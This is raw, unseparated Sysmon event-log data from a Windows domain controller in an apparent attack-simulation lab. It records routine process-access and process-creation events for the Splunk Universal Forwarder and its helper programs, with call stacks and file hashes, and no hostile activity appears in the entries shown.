13:43:17.521{08A6967A-4287-6000-0C00-000000009A01}5883124C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000014365Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:43:17.521{08A6967A-4286-6000-0500-000000009A01}636652C:\Windows\system32\csrss.exe{08A6967A-4A75-6000-9605-000000009A01}6772C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000014364Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:43:17.521{08A6967A-4325-6000-B900-000000009A01}11763752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{08A6967A-4A75-6000-9605-000000009A01}6772C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000014363Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:43:17.522{08A6967A-4A75-6000-9605-000000009A01}6772C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{08A6967A-4286-6000-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{08A6967A-4325-6000-B900-000000009A01}1176C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x800000000000000014388Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:43:18.865{08A6967A-4325-6000-BD00-000000009A01}30161356C:\Windows\system32\conhost.exe{08A6967A-4A76-6000-9805-000000009A01}3536C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000014387Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:43:18.865{08A6967A-4287-6000-0C00-000000009A01}5883124C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000014386Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:43:18.865{08A6967A-4287-6000-0C00-000000009A01}5883124C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000014385Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:43:18.865{08A6967A-4287-6000-0C00-000000009A01}5883124C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000014384Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:43:18.865{08A6967A-4287-6000-0C00-000000009A01}5883124C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000014383Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:43:18.865{08A6967A-4286-6000-0500-000000009A01}636752C:\Windows\system32\csrss.exe{08A6967A-4A76-6000-9805-000000009A01}3536C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000014382Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:43:18.865{08A6967A-4325-6000-B900-000000009A01}11763752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{08A6967A-4A76-6000-9805-000000009A01}3536C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000014381Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:43:18.866{08A6967A-4A76-6000-9805-000000009A01}3536C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{08A6967A-4286-6000-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{08A6967A-4325-6000-B900-000000009A01}1176C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x800000000000000014380Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:43:18.349{08A6967A-4A76-6000-9705-000000009A01}53286348C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{08A6967A-4325-6000-B900-000000009A01}1176C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000014379Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:43:18.193{08A6967A-4325-6000-BD00-000000009A01}30161356C:\Windows\system32\conhost.exe{08A6967A-4A76-6000-9705-000000009A01}5328C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000014378Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:43:18.193{08A6967A-4287-6000-0C00-000000009A01}5883124C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000014377Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:43:18.193{08A6967A-4287-6000-0C00-000000009A01}5883124C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000014376Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:43:18.193{08A6967A-4287-6000-0C00-000000009A01}5883124C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000014375Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:43:18.193{08A6967A-4287-6000-0C00-000000009A01}5883124C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000014374Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:43:18.193{08A6967A-4286-6000-0500-000000009A01}6361144C:\Windows\system32\csrss.exe{08A6967A-4A76-6000-9705-000000009A01}5328C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000014373Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:43:18.193{08A6967A-4325-6000-B900-000000009A01}11763752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{08A6967A-4A76-6000-9705-000000009A01}5328C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000014372Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:43:18.194{08A6967A-4A76-6000-9705-000000009A01}5328C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{08A6967A-4286-6000-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{08A6967A-4325-6000-B900-000000009A01}1176C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x800000000000000014397Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:43:19.943{08A6967A-4325-6000-BD00-000000009A01}30161356C:\Windows\system32\conhost.exe{08A6967A-4A77-6000-9905-000000009A01}4032C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000014396Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:43:19.943{08A6967A-4287-6000-0C00-000000009A01}5883124C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000014395Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:43:19.943{08A6967A-4287-6000-0C00-000000009A01}5883124C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000014394Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:43:19.943{08A6967A-4287-6000-0C00-000000009A01}5883124C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000014393Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:43:19.943{08A6967A-4287-6000-0C00-000000009A01}5883124C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000014392Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:43:19.943{08A6967A-4286-6000-0500-000000009A01}6361144C:\Windows\system32\csrss.exe{08A6967A-4A77-6000-9905-000000009A01}4032C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000014391Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:43:19.943{08A6967A-4325-6000-B900-000000009A01}11763752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{08A6967A-4A77-6000-9905-000000009A01}4032C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000014390Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:43:19.944{08A6967A-4A77-6000-9905-000000009A01}4032C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{08A6967A-4286-6000-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{08A6967A-4325-6000-B900-000000009A01}1176C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 